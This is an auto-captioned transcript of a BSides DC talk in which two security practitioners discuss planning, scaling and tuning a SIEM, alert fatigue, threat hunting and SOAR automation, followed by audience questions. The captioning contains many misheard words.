
besides DC would like to thank all of our sponsors and a special thank you to all of our speakers volunteers and organizers so anyway for anybody who is here for the last one thank you I appreciate somebody who actually could listen to me for two hours that's that's an achievement we're gonna talk about sim introductions first oh this isn't working Hey there it is yeah all right hi everybody I'm jr. currently uh our sim architect over at US Census I also do a lot of soar development so I do a lot of automation a lot of sim work I've been using Sims for quite a long time believe it or not Cisco had a statement one
point cisco marvel's name of the tool i use that that was your first one right my first one it was horrible but I did use it I've actually wrote one a little bit better than what they had but never really got a Canon or anything like that the stuff I kind of built around different kind of detection methods also I tend to golf a lot stuff of my apparel I just came from a sport conference so and i golfed three days I had seven days I was over there so I had a good time and I also learned a lot so that's that's out of character because like I'm the manager non-technical and you're the
smart one but I don't golf and you golf it's really out of character I will be a seesaw one these days I see so might be just from golfing there you go so I'm Shaun I'm the head of the security operation center of resin media I used to do breach consulting once upon a time and other proactive services like threat hunting I'm a Sim user I'm a program builder for soccer at hunting whatever and I have a podcast called detections and it's relatively new and kind of cool but I mean listen let's plug it is a shameless plug it absolutely is but I have you know no shame I feel no shame so all right so
let's kick off Jarek what is a sim well what is in a sim is a is one of the most productive things that can be in your environment for security it's it's very it is time consuming it takes a lot of maintenance but what it gives you is a place one to store all your screw related data all your all your log sources you can put that in the sim another thing great about a sim puts you have everything in one place you can do correlated searches with a sim oh and he's putting up in the different types of Sims now here's lots of Sims out there there's ELQ which there are sponsor so we could thank them we also have Thank
You fire I helix they're here as well and as your Sentinel they're also here so if your sponsor I will shout you out obviously I'm kind of jaded I'm a small person but I do I've worked with other Sims I've also helped companies with other sims and best practices with Sims in general so the first thing that you have to do with any piece of security technology not just a symbol expecially a sim because of the relative complexity of the tool is know your use case there's a whole bunch of different ones you could literally be in security for compliance we talked about that a little bit last time but it is a valid use case
security operations maybe your sock and I our teams are using this so they're gonna need certain logs maybe you specifically want to use it for threat hunting maybe you want to use it for instant response maybe you want to use it for insider threat that's gonna drastically change the type of data that you pull in and how you kind of have to process look at that data and what you're gonna build from it so it's very important to know your use case and then we start to get into the problems so let's talk about scoping junior okay so scope your logs force problem basically you need to figure out what you want to alert on which one detect
what you need to figure out from your environment typically I look at all my security tools your firewalls access logs anything and most of that things is generally a quick check box a security related and again that will drive from your compliance compliance is kind of easy part it's an open book test it tells you what you will collect how you'll collect it how you will retain it so you follow those you follow those guidelines in creating your solution you changed it there now you can look there but no I did not change it okay and also yeah I know in your environment you need to know what's in your environment what you're going to collect on it so if
you're using if you have a lot of AWS devices you need to understand what's a log on AWS and what what was relevant on those systems you also need to know all the security groups that have things that feeding your system and who can change those passwords if those things get changed that should be treated as creating incident because that's hindered hindering your security process be able to audit and monitor those types of activities so it's also important in this case to know how you want to go about finding things or your detection strategy or you're gonna go out of the box a lot of most simplify out-of-the-box Plunkett's along security essentials everyone has like these are
our based detections are you gonna use a framework and try to map to that are you gonna take a hybrid approach and try to pull in a whole bunch of different things and build a program like that we can talk about kind of an example so this is my tier attack I'm sure it's everybody seen it by now because it's been beaten to death we're gonna use it anyway it might seem overwhelming but just a couple things or one log type can actually get you data that you can use to find a lot of different attacker techniques and that's beneficial but you can also go very what are we seeing who's being attacked so if you look at
the red canary 2019 threat report this was great this straight tells you hey PowerShell number one scripting number two this is how people are getting attacked and we can talk about specific ways to find each one of those so we can talk about the event IDs for PowerShell we can talk about how to look for odd port connections we can talk about different email logging that's beneficial no definitely definitely did like this red canary report but one thing I noticed was missing off their report no mention of phishing how many you get phishing attachment it's on there it's down a little ways because most of them also include PowerShell these days but yeah everything in
PowerShell but yeah it's there but yes most people get attacked by phishing you're right which I think we would tend to see there on the top typically yeah so we've kind of talked about that a little bit now that we have an idea of what we want and what we're trying to solve for we really have to focus on data throughput what are we gonna bring in and how are we gonna bring it in so take it away right so now just because you now tip the typical answer is just log everything well that's not possible run us the cost it costs too much it costs way too much to log all the data sets
that you actually need so you need if you if you don't have an analytic based on those set of data you sure really shouldn't be logging it Licensing's not who said ma'am he said Mary no no well no no the other thing is often that memory but I often hear storage is cheap storage is very cheap but when you need to query that data or over a large data set then it gets very expensive because you're talking about I ops you're talking about writing searches on course so typically when you're running a search you're using up a core so if you have even if you have a massive massive infrastructure each search table you will take up a core and now you also
look at your I offs on your back-end for your for your for your storage solution now if you're if you're storing this data on a purely storage solution it's not gonna work it's not gonna give you the I ups you need to actually get data from it if you can't turn that data into information or would like to do it when in assemble in the soil world there's ten data into action there's no point of cooking data in the first place you're still up kind of went over at already but yeah you need to understand what's kind of going in firewalls whom 'angels firewalls who to call when you see a data source that's not coming into your
sim you need to know who to call who to wake up putting it on the horn to remedy that issue a lot of times I'll call the NOC guys late at night even though I'm not working late at night but I'll get an alert and then I'll definitely hit them up to figure out okay this thing stopped coming in who can we call to get this get this remediated instantly so that's the doors of being on-call so integrating with other security tools as a topic as well well I definitely all your security tools need to flow into your sim you you want data from for all your main security tools it's part to build part of your use cases if you have
security tools in you're not getting gloves or getting information from them what's the point of having them in the first place and another thing is even if you Brandon we all live on the East Coast a lot of times I see logs coming on on East Coast time it's not the way you want your lungs coming in you want everything you want everything standardized UTC Zulu Jim that's how logs used to come in that way we don't have to figure out what happened first because of different time different time stamps it's a pain granted I like doing regex I do radix all day and I synchronize time for us with that but let's just get it in the
first time don't put all the extra extra processing on your sin so let's move on to data storage and retention well again typically these are these are driven by your compliance requirements this is the easy part it's the open book test they might not tell you exactly how to implement it but they'll tell you what they're looking for what you need so when you're going through an audit you can you can able to intelligent explain to them where I'm logging this because this is what it says this is what we're doing this how we're collecting it if you're able to intelligent Auk about it for the most part and I never seventh time you'll be
okay during an audit there is that one auditor they'll probably won't care and say well you need to do it his way or you know you're done but for the most part understand what you're doing and understand the why be able to talk intelligently about what you're collecting and how you're doing it and why you're doing it for and data protection data at the same needs to be protected and it cannot be modified by any means so if data gets full in in a sim solution there needs to be something where it's automated ly what moderation is going to move that data it's like a hot warm data to cold data that's that's frequency searched if a person can
manually go in there and audit those logs or edit those logs that's the desitin issue and that's the big red flag as far as any kind of audits are concerned the other thing is scaling now well in security we are typically a cost we're not to be looked at as a benefit for the company so the way I typically go about it is scale up scale up first so you you look at your look at your systems you scale up get bigger servers so if you're starting with like a medium instance something in AWS you scale up get a larger instance get something a little bit better monitor performance once you get that instance right size then you scale out
and get multiple industries and build the cluster because you need to have high availability for security tools there's typically a requirement and you will get that for most of your compliance platforms compliance requirements and fast storage well if you can't search it what's the point of using it if I'm working an incident and I have ten incidents and this one's gonna take me 30 minutes to do it's not gonna get done if you have ten incidents I think you have other problems just gonna specially concurrently well you already talked about that in your other talk so I'm not don't need to go there but yes the data needs to come back quickly for the analyst to actually make
a decision the Aniston dough is this malicious or benign traffic so did they it needs to come back quickly so let's talk about the analyst a little bit or let's talk about seeing bad guys this is what I do for a living all the stuff he does way over my head like this he used to be an architect accident yeah for like six months and I quit because it's I didn't like it at all lack of visibility this is a big one if it's not there we can't alert on it so one of the things that I've done for a lot of the programs that are built is we hold pretty much weekly meetings for different log requirements
where we work with different teams and set requirements on logs we say hey we're working through this use case we have this thing that we need we need you to have these logs or we need to start gathering these logs then we rack and stack and prioritize him because it's really a must because if you don't have it we can't alert on it and if your broaden your detection strategy you can take multiple log sources but again if you don't have him you can't see it lack of context this is a really really big one too if you don't have any context of what that alert is so if you have an alert that comes in it exists it gives
you maybe two bullet points or you get like just a source IP and not a destination or whatever the case may be you can do very little with it and it's going to spend on it or force you to spend a lot of time continue going forward and if it's not parsed one you're barely gonna be able to alert on it to you're barely gonna be able to read it and it's just going to take more time yeah there's a big thing with me data data comes in you need to have some kind of a mission process for that data to give context not just an IP and a hostname but what kind of system is it's
just a critical system this is a high-value asset it's a system that that that's on 24/7 or it's a nine-to-five type system that context needs to be there available for the analysts because at the end of day is mostly about nominee detection trying to find the things that stick out yeah and that brings you into a big one that security teams everywhere face not actionable alerting so I've worked in a couple places and I'm just gonna spend not going to mention any places but I will spit out some numbers I've worked at places where the average time that an analyst had to look at each individual alert was 3.2 minutes that was their workflow they had 3.2
minutes to make a determination on whether or not that continued or that was non malicious the majority of those things were things that they don't even look at it leads into alert fatigue which I'm actually pretty sure is the next bullet point but half of those things that they looked at and that came in there was no action that they could take they could either forward it to the next person or they could close it in that case what what's their job is their mission to be there to forward something to the next person there's their mission to be there to try to find bad guys so I always loop back to understanding your mission and sticking to your mission as
being very important in that context then we talk about alert fatigue and alert fatigue is a big one - same thing 3.2 minutes the problem is is everybody talks just about fidelity and I've been on a kick for four years to try to move away from just fidelity and look at three categories fidelity frequency and intent so how bad is this in my environment how often does it fire and then what's my ratio of you know true positive or investigate able to false positive it leads you to a couple more false positives but to a much better and more holistic detection strategy intends to analyst get burnt out a little bit less and it's very hard to make the fidelity
alone argument because oftentimes your breach debt is going to be in like the low fidelity thing at the bottom anything alert fatigue will kill a security program because they let things go that should be investigated or should try to more follow-up instead of escalating and dig it's closed that notable then we're vendor agnostic here don't use the word notable Oh event no you're right and that's the thing you get so sick of seeing the same thing over and over again you're gonna move on and I find it really interesting you talk about security programs the the sock the person who typically handles the output of the sim is oftentimes the most untrusted part of any security
organization and nobody ever listens to and that sucks but because of that that's why the fatigue builds because they don't have any ability to fix it so providing these individuals who actually have to do this work day in and day out if you give them and empower them to fix things it solves a problem but that's not what this is about that's a different soapbox so let's talk about kind of the alerting strategy and we brought this up a little bit earlier so I'm a big believer in a hybrid alerting strategy so taking things from multiple places feeding those into your sim and using them for an advantage so you've got a whole host of tools and we're
gonna try to stay pretty open but you know shout out to Moloch because it's awesome and my company makes it carbon black CrowdStrike whatever it is that you have you can feed all that data into your cell and you can feed information in context there and that can give you a lot of information then you're gonna have all of your Intel and Intel can be really valuable when paired with other things and then you're gonna take a framework and potentially build to a framework again I know this one's been beat to death but it works so we've used it so if you're running into that we can put that to a use case so we can take
this as a use case and one thing that's worth mentioning is so say I have crowd striker carbon black and I have a whole bunch of data and I can send a whole bunch of all the logging data not just the alerting over to a sim I can create custom content off that I can look for intelligence across that there's a lot of things that you can do when you start to centralize that data in one place that becomes really beneficial and you no longer become reliant on just a vendor's detection so I stole this directly from writer who did an apt three evaluation plan because it made this really easy so they evaluated a
couple customers they were testing for these things across the my tier attack framework I do realize it's very small we will make the slides available tools so we have CrowdStrike in this use case this is what CrowdStrike caught from that section and this isn't this is pure detection that came up to an analyst this is what was cought so that can tell us a couple things we have some Intel that can give us some more stories so this is general Intel on a PT 3 this gives us hashes gives us call-outs gives us see - that's going to cover not necessarily to a specific but we'll be able to detect some stuff in the following kind of
general tactics or techniques so where are gaps what have we missed what if they switch something if they switch an eye on see if they switch and stop using PowerShell what don't we see about that general attack path well we can color some in we can look for command line interface and suspicious we can look for your scheduled tasks we can look for new creations of accounts services there's a lot of different things that we can go well this is what we know this is what we know will detect now we can start to build a methodology around covering those gaps and adding new stuff to make sure that we find evil through that use case you want to do one
talk on that one a little bit too I'll take so it's not much different when we go into hunting although a couple things change when you're in hunting and IR you're much less about alerts and you're much more about data retention what happens if we detect a breach a year afterward does anybody think that's uncommon to detect a breach a year after it happens but the average it's about the average so do you have a year's worth of the necessary logs that you'll need to investigate that well who here has a year what's a full peak at anybody is that possible I've seen it before was it a three person company through our agency okay
but what do you have in how long do you have it for that's really important and you don't have to store everything like you can get a lot from some metadata informations I mean bro-bro is pretty lightweight and you can keep that forever you can get a lot from that searching through big data you're looking at big bigger data sets you're looking at from a hunting perspective so you're going I want to see all PowerShell or I want to see all unsigned binaries that are 64 to 75 kilobytes I realized that's very specific but I did that on a on a breach case so that brings the importance of making sure that your data is indexed in parsed
appropriately also making sure that there's training on how to use the tool in its query language effectively I'm personally a big fan of index equals star I had to but that's just me lack of visibility that's another one and that's we kind of talked about this earlier more than just an alert you want all the visibility if you're in an IR hunt case because you don't know where they came in you don't know what they went to you don't know where they pivoted from none of that so the more visibility you have the better now it does have to be realistic because you can't overload and some data you just don't need but it makes sense before you even start doing
this stuff to prioritize what log types and sources you need and how long you're going to store them for there's a lot of setup that goes into a tool like this before you get to do all the cool stuff and it a lot of people skip that part yeah not a great thing too for one of one of the hunts we did we looked for a new user agent strings and that was widely successful for one of our teams so this thing's think outside the box which probably is all things you can eat it on lighter last I checked might not be so if we come back to this same use case same attacker scenario same all that we know
what we can detect we've built some other detections for it we know what we would see let's let's add a hunt last time this is what we got oh this is what we can hunt and I'm I've missed some I guarantee I've missed some so don't hold me to it but these are just some real quick things that we can hunt so maybe we have a very specific PowerShell detection but we want to look for PowerShell overall or command-line interface or schedule tasks or new services or process injections these are all things that we can kind of take and say ok my hunt rotations coming up what do I want to look for let me pick a use case let me
for my hypothesis based on that use case and then let me start testing different things and looking for things that would fit into that attacker pattern that can become really beneficial and then you can kind of go from that and pivot from that and say hey I found something really cool move from there to let's see if we can fine-tune that turn it into a detection so that we have it long term and not just for one month until next year when we do it again just some kind of cool log sources that are really beneficial and then I found doing IR engagements from a Windows perspective but if anybody wants to take a picture
that feel free but it's all stuff that we've looked at stuff that we've used not just for detection but in NIR we wanted to see this stuff because we'd find a lot of bad there so that brings us to moving past the basics which we've got this set up we've got a strategy we've got a bill we've got something what else can you do yeah I definitely like to automate routine process that your sock normally does I don't like the idea of seeing analysts typically doing things like nslookup LDAP lookups creating tickets sending emails I 10 don't want to automate Lauderdale's processes or at least automate those frameworks where Deanna's can gets kind of that that
stuff will pop up Janice will see it and then it can add some notes and then send it off Center off their way kind of kind of saving their time because like I said we have a shortage of people doing these con this kind of work and it's not gonna get any better granted it might be a self-inflicted wound would escalate another topic for another day but that's that's the cake nest estate that we live in so I'm a big big believer in automation in the security process it allows the analyst to be an analyst or a detective or the person who goes and finds things and lets them focus more on what it is that
they should be doing rather on oh man this thing happened I got to open a ticket with that team to fix it I don't that team to fix it I gotta open a ticket for myself to track and internally I gotta go around these five queries like it removes the minutiae which is really really nice and something that I'm glad to see that's really coming up so to speak and that's getting more popular I am very excited to see some of the platforms that do this get way more mature over time next one AI and machine learning applied to data and I'm not gonna sit here and pretend to be an expert on either of
those topics I am gonna say that several of the time that I are a lot of the time that I spent as a consultant we had a drinking game whenever this came up in a vendor called the use cases of it we've had a customer that were able to use machine learning to detect when drives are going to fail not a great use case because grain you're not you're not saving a ton of money but it wasn't it could be predictive and kind of ordered drives before the drive actually fails and swap it out before you had a down drive and I mean there's some really good behavioral analytics that kind of come with this
and you can apply a lot of this to that behavioral analytic so as you start to look into like some of the user behavior analytic tools and stuff that use this like this person never ever logs in from this location at this time and we've got a year's worth of data to support that like that can be really interesting and really beneficial so I think some of the AI and ml stuff will move towards that and getting like a little more of that scope detecting on exfiltration things like that become the anomaly detection side of the house mm-hmm an anomaly is probably honestly one of the best ways to find bad guys atomic is much harder behavioral analytics we kind
of already covered that one and then the last one is soar which is essentially automation of routine processes but like I said we added the word and I was busy with the other presentation so I didn't set the transitions right apparently fair enough but you have a quick thing on behavioral analytics order kind of you typically don't even really need like really fancy tools to do this kind of stuff with per customer they had HP SS fully implemented and we I was tagged to do some insider threat work here tag you're it so now I looked at some one thing that they had in place so I figured out okay let's just take a look at you know removing removal media
so I wrote a short Python script basically taking people who are authorized to burn media and people were actually burning media and then whatever that Delta is since an HP SS team let them deal with that that what happened was they actually got emails they were pretty upset that I was able to find people burning removing media with HP SS fully installed and implemented so now was it a fail within the group policy or was an HP SS itself really not the thing is that we found it and now we need to need to fix it so trust but verify I gotta stay in security so look at problems and give it a second look
don't assume things are working as should take a moment to give special thanks I don't think we're gonna read them out but they do exist this list gets longer every time we do it but thanks to all the people who kind of proof read this helped us out with it we're inspirations for it thanks to everybody who came to watch we appreciate it do you have any final comments on the topic itself or pieces of advice for Sim users everywhere if you are seeing news review if you are some user I'll definitely say look at some source solutions it's not built to replace your job it's gonna make your stuff easier for you so don't don't don't fear the
sword contrary to the dashboards that they put up whenever you buy one that says you've saved this much money by automating you can fire this many people you can easily hide those dashboards like I've done no I would agree automation I think is the way we're going it really is but the other one is just have a mission statement and ask everything every question that you ask should be pasted around that mission statement does it meet that mission statement it will make what you do so much easier so you can avoid being a death by a thousand cuts shop and doing a thousand things that you shouldn't be doing and not actually being able to
focus on what you want questions thoughts comments concerns gripes come up and grab the mic or I guess I can just jump down I'm cool with that here you go my question is for junior so you said that seeing the NS low cups and the LDAP lookups you didn't want to see that in you because it's kind of what I would think it was an anti-pattern so anything more there anti-patterns like making purchases on the wrong kind of fast storage or any like you you've got the basics down and now you're ready like up level it's any mistakes there you can limit to three I guess okay maybe like anti-pattern so I I don't think
I think I get it it's it's not that he didn't want to see that it's that he didn't want the analyst manual I want an Asst manually doing it that Gator should already be there presented to the analyst an analyst should not get an alert with dissing IP address for something that's internal an ANA should not get a because you know a lot it's pretty most part our user names are kind of code and not typically your fill out username that should not be that the ANA to get your full name what section and your email address like that should be there for TLS when the alert fires your very intimidating from down here I guess
yeah well I'll say what Nexus let the analysts you know they'll have more time to actually work on incidents and research research research research the events look at trends and patterns walk with your threat Intel team and not just take everything at face value let the analysts make decisions critical thinking is important in this industry if you if you're training them to just check boxes and they see oh well this is benign is benign but not actually you know they see something from virustotal it's only it's it's it's not malicious they assume is not malicious well what's happening on our host what's happening on our infrastructure what process is making that that call you want
analysts to think that way and look more into it into that into that incident that's assigned to though you said it way better than I did yeah that's right so one of the things that I do programmatically and it's time pending so we're always trying to get more time is I dedicate 25% of analyst resources to hunting exercises and a monthly rotation that includes things like working on tuning content which helps build them research projects that they can go look for new ways to find badness and there's an outcome of each one of those products or projects but I try to keep 25% of time so everything I can shave off gives my analyst more time
to do things that help build us rather than just doing the stuff that's happening day in and day out question so if you add context it might give you information from other datasets that you can pull in got additional context and that's absolutely that correct yes well yeah so you're talking about the new in your use case and you had a bunch of different options up there my question is if you're like a small shop and you've got multiple you needs there how much trouble are gonna be are you gonna find yourself in if you're trying to use this for multiple use cases aren't you guys start stuffing yourself in the foot and you just push
data to try and deal with or in most cases I don't think so so small shop you're realistically gonna have less data so it does become what you can afford in a lot of ways so can I afford this can I afford that so you have to prioritize a little bit based on what your cost model is and what you're willing to pay but take that equation out of it I've been in shops and I'm in a shop now where you know we have multiple different teams and use cases that run out of the same tool we tag things a little bit differently we collect things a little bit differently we have a few tension points every now
and again of going like I want this stuff to go away well I need that and that'll happen a little bit and then you kind of like weigh your risk of going away verse needing it and work together and get there but in most cases you're probably gonna have more than one use case but each team should only approach the tool from the use case that they need and then work with other people and say well this is what I need what do you need and then kind of build that plan together there you go so if you look into the role of junior analysts I fully agree that using soar will further and make
your sock more efficient but I also believe that junior analysts can really learn on the job by doing that more simple work so how do you look into the future of training and onboarding junior analysts in becoming more senior to automate or decide what to automate it's or so I genuinely tend to hire junior analysts because I like to build people from the ground but teaching them how to do in an nslookup isn't really teaching them a high thing of value teaching them how to think like a detective and approach this problem and go look for the other things so I have a saying in any shop I've ever been in and that's that I don't run a paint-by-numbers sock
there's no step-by-step you'll have guidelines but like you use your brain so when I bring somebody in will kind of walk them through the process this is what you can usually look for and then we move past that and we go okay like you saw this thing you can go look here you can go look here you can go look here and we figure it out so I don't think anybody's talking about gating each step of the investigation process at that case you don't really need a person but we are talking about giving them more time to focus on those investigative steps and the deeper investigations and that learning opportunity which is where I think
they'll get real value the critical thinking side of it as opposed to I have to run nslookup every time or check virustotal 500 times a day
100% yes so yeah I build my play books with my with my junior and I said doing the day-to-day because the senior analysts are typically putting out fires in with leadership going to meetings when I build stuff in the store I typically grunt through about the junior analyst first and then I kind of like this the senior and let's take a look over and then we kind of meet it then we build it and to implement into our product so there's an interesting thought process how many people here like work in a soccer is an analyst in some way shape or form this decent number outside of that how many people feel like they have direct value on the
work that they do and what work they do I would hope everyone but that's often not the case and I only saw about half hands so there's a lot of people who are shy or people don't feel that way if you don't feel like you have direct impact on what you do are you happy there and do you want to stay there I I got some may so that's the thing no like if you don't give the analyst some ownership over what they do and trust me is a guy who runs socks most socks analysts don't get a say in what they do and it at least a lot of the ones that I've been
around and it's awful like and burnout is high and they quit really quick and they get jaded from the whole industry it's ridiculous it's awful but a lot of it is because they have no say which means they don't grow they don't move forward they don't anyway completely different soapbox but yes you had a AI and machine learning up there if you're not retaining data for long periods of time is it even worth tackling that as a use case you know if you only have 30 days worth of logs you know the more data you want the more data you have the more I guess the more likely that the data the use cases you're building are
actually going to match upon what you're looking for so is it even worth tackling that if you're only retaining small amounts of data yes you can summarize that data for it is 40 40 AI ml scenarios you should be not going to everything that says scope is very important in this world and the work that we do so you run it every day you run the I run it every thirty days run the analytic on it store the analytic because that's much smaller and then 30 days later store that analytic and then you can compare analytics so there is value there it's more complicated but there's value there hi so I'm auditing sim right now for my organization and
we've never had one before so everyone's just like yeah Sam I've heard of that go for it that'll be adorable you know kind of like when you're baking cake with your kid and you're just like here you just do this part right there so I've got data coming in and what I'm noticing is that certain things at the NOC level are being categorized wrong so like regular ad FS logins or being considered threats so it's messing up my stream data it's like why do we have 10,000 threats in an hour oh everyone just logged in so once I kind of weed through that to figure out what's actually threat and what's not actually a threat how long do you think
I should start looking at data to build my baseline before I start like putting in anomaly well one thing you're always going to need never ends right so you you made this tuning never ends if someone tells you that they're lying they're wrong you know no but note like I said you you so you have you have something needs to get tuned out of your sin that shouldn't be an alert unless there's something really wrong in that organization so YouTube but states are an otter you've done your job and you found it so good on you i I just have to say as we go through this this crowd of bee says DC is one of the best crowds
I've ever had at a conference ever yeah it's fantastic I will agree good questions well so you have a question for you good so I'd like what you said of our tuning never ends but where does the tuning begin you get a sim and you have alerts and things coming in from servers and you asked you know the various types of our server operators what is important and they don't know so where do we begin to start tuning the sim to make it actually useful for whatever's coming in well you need to track your false well I think something that we did we tracked all our false positives right once things are vetted and analyzed they
see okay so we have a typical Anakin let's say we see this analytic 80% of these are false positives so maybe we just start looking at Danyluk and tune out somebody had noise out because you don't want to give the analyst busywork like I like Sean alluded to earlier alert fatigue will ruin your sock so you can definitely count but like and you can do it by loudest but I'm gonna present one other possibility here and one other approach what's your industry and then what's the threat landscape of that industry so if you look at industry verticals and you understand who might attack you and how they might attack you or what data is important to you so your
crown jewels start there start with what matters to you most I've failed implementing it many many times and I think what I what I've learned from that was utilizing the Pareto principle so even if the industry that you're in and the the company doesn't really know what's going on you could start with your Active Directory domain admin right and then work from there and scale out as opposed to spending millions and millions of dollars paying Ernst and Young and will not really won't say their names but to do what some of the things that are low-hanging fruit but I had I had a question are there a comprehensive of like to map to frameworks that are utilized in the the
minor for like data sources and things like that and then what are some trusted reliable ways to send them without using agents is there another alternative that so I can cover a little bit of the first part and this is the kind of fun for me because we talked about mitre and it's great and I use it and we're mapping to it but I can also tell you that how do I want to say it oftentimes you need way more than one detection per technique I'll put it that way so a lot of people who like heat map out might it'll be like oh I got 150 detections I got mitre covered I'm good to go
I've got like 15 different ones just for valid accounts that look for different kind of stuff I am I've always been a little bit of the camp that like detection building is a very custom thing for your environment and should be taken as your environment so I use very little out of the box from that perspective or like shared I'll read about something maybe I'll see something posted somewhere and I'll take that and I'll try to adjust it specifically for my environment before anything goes live otherwise you end up getting into that point where things are flying off the chain because somebody turned on 150 out-of-the-box rules and didn't do anything else with it for your second
question I guess the second part though about trying to get get this data without agents I mean obviously we could use like syslog for never because there's devices on a network that we can't put agents on anyway so we're utilizing syslog we're printing on a syslog server preferably it's a small cluster so nothing goes down so you know and then but there are some tools I can't think of any of of top of my head right now but I know some good that well there are tools that can forward without an agent and you can ingest it the same way into your sim oh yeah oh yeah so kind of talking about I have kind of a two-fold question may not be
related but two new signatures with regard to the fact that you've got you know indicators that are obviously accumulating so the question is is are there new best practices for tuning I've got organizations that are just accumulating and you know storing and never deleting obviously and then the two second question is is at what point do you pivot to kind of a hunt model rather than just sort of alerting on everything okay so the first question is about tuning and I think I think I can probably answer this well so best practice for tuning is general involvement of the teams who are handling it throughout most of it so like as stuff comes in and
gets investigated if there's multiple teams working if there's one team working it's it's live and in real-time so you're doing live and in real-time investigation and then clicking a button and sending it up for tuning or if you're automating clicking a button tuning it without having to send it to somebody else to do it or do it yourself the second part and this was quite literally I think my topic in the last talk the the the shiny light syndrome so like hunting has extreme value in a lot of ways like hunting is a very valuable service because you're going and looking at thousands upon thousands of low fidelity indicators for a specific thing if you're doing a hypothesis based which
is a lot of people are saying I think there might be web shells how can I go find web shells let me just look for web shells the problem is is you can't have just that because if you do hey maybe January I look at web shells and I'm not gonna get back to January until next year and March what happened in between oh did we build any detections for those web chills no oh well hey we were back to hunting and we found a whole bunch of web shells from seven months ago oh and a whole bunch of data was exfiltrated - oh great so hunting is an add-on that you should use to strengthen your other programs
look for gaps and help refine in a lot of ways at least in my mind with regards to the tuning question I did want to I do agree with you wholly about the use case and I can't evangelize it enough you you tuned before you have to tune when you develop proper use cases like if you've developed the proper use case to ingest your Intel feed but didn't talk about while you're developing the use case now you have to feed out that you have to weed out those Intel indicators after a certain amount of days then you're you're you're setting yourself up to have to tune them afterwards so if you develop their yeah right use cases
you're tuning before you even have to do and sometimes you don't necessarily see the data so you don't know how you need to tune it but like when we Institute a new rule our policy doesn't send it right to an alert for my team it goes somewhere else for general review normalization and tuning before it ever goes live yeah especially using using indicators in a soar platform I need to see that data before I automate that data I mean I'm not gonna make a guess I didn't automate that's going to lead to failure every time by the way I just checked are we at time or do we have time for more questions we're at time
thank you everybody [Applause]